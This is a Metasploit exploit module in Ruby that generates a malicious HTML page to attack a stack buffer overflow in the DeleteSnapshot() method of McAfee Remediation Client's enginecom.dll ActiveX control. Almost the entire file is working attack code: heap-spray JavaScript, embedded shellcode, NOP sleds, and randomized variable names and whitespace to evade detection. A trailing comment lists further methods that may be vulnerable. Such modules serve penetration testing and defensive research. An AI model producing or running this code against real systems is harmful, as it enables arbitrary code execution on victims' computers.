##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = LowRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'McAfee Remediation Client ActiveX Control Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in McAfee Remediation Agent 4.5.0.41. When
        sending an overly long string to the DeleteSnapshot() method
        of enginecom.dll (3.7.0.9) an attacker may be able to execute arbitrary code.
        This control is not marked safe for scripting, so choose your attack vector accordingly.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'MC' ],
      'References'     =>
        [
          [ 'OSVDB', '94540' ],
          [ 'EDB', '16639' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true,
        },
      'Payload'        =>
        {
          'Space'         => 1024,
          'BadChars'      => "\x00",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A } ]
        ],
      'DisclosureDate' => 'Aug 4 2008',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('FILENAME', [ false, 'The file name.',  'msf.html']),
        ])
  end

  def exploit
    # Encode the shellcode.
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

    # Create some nops.
    nops    = Rex::Text.to_unescape(make_nops(4))

    # Set the return.
    ret     = Rex::Text.uri_encode([target.ret].pack('L'))

    # Randomize the javascript variable names.
    vname  = rand_text_alpha(rand(100) + 1)
    var_i  = rand_text_alpha(rand(30)  + 2)
    rand1  = rand_text_alpha(rand(100) + 1)
    rand2  = rand_text_alpha(rand(100) + 1)
    rand3  = rand_text_alpha(rand(100) + 1)
    rand4  = rand_text_alpha(rand(100) + 1)
    rand5  = rand_text_alpha(rand(100) + 1)
    rand6  = rand_text_alpha(rand(100) + 1)
    rand7  = rand_text_alpha(rand(100) + 1)
    rand8  = rand_text_alpha(rand(100) + 1)

    content = %Q|<html>
<head>
<script>
try {
  var #{vname} = new ActiveXObject('Enginecom.imagineLANEngine.1');
  var #{rand1} = unescape('#{shellcode}');
  var #{rand2} = unescape('#{nops}');
  var #{rand3} = 20;
  var #{rand4} = #{rand3} + #{rand1}.length;
  while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
  var #{rand5} = #{rand2}.substring(0,#{rand4});
  var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
  while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
  var #{rand7} = new Array();
  for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
  var #{rand8} = "";
  for (#{var_i} = 0; #{var_i} < 1024; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
  #{vname}.DeleteSnapshot(#{rand8});
} catch( e ) { window.location = 'about:blank' ; }
</script>
</head>
</html>
|

    content = Rex::Text.randomize_space(content)

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(content)
  end
end

=begin

Other vulnerable method's:

[id(0x0000000c), helpstring("method CreateSnapFromDefaultProfile")]
void CreateSnapFromDefaultProfile(BSTR szDescription);

[id(0x00000013), helpstring("method CreateReportOfSysInfoDifferences")]
void CreateReportOfSysInfoDifferences(
  BSTR szOldSnapFile,
  BSTR szNewSnapFile,
  BSTR szOutFile,
  short format,
  short append);

[id(0x0000000f), helpstring("method CreateReportOfSnapshotDifferences")]
void CreateReportOfSnapshotDifferences(
  BSTR szOldSnapFile,
  BSTR szNewSnapFile,
  BSTR szOutFile,
  short format);

[id(0x00000012), helpstring("method CreateReportOfAssetDifferences")]
void CreateReportOfAssetDifferences(
  BSTR szOldSnapFile,
  BSTR szNewSnapFile,
  BSTR szOutFile,
  short format,
  BSTR pszAsset,
  short append);

=end
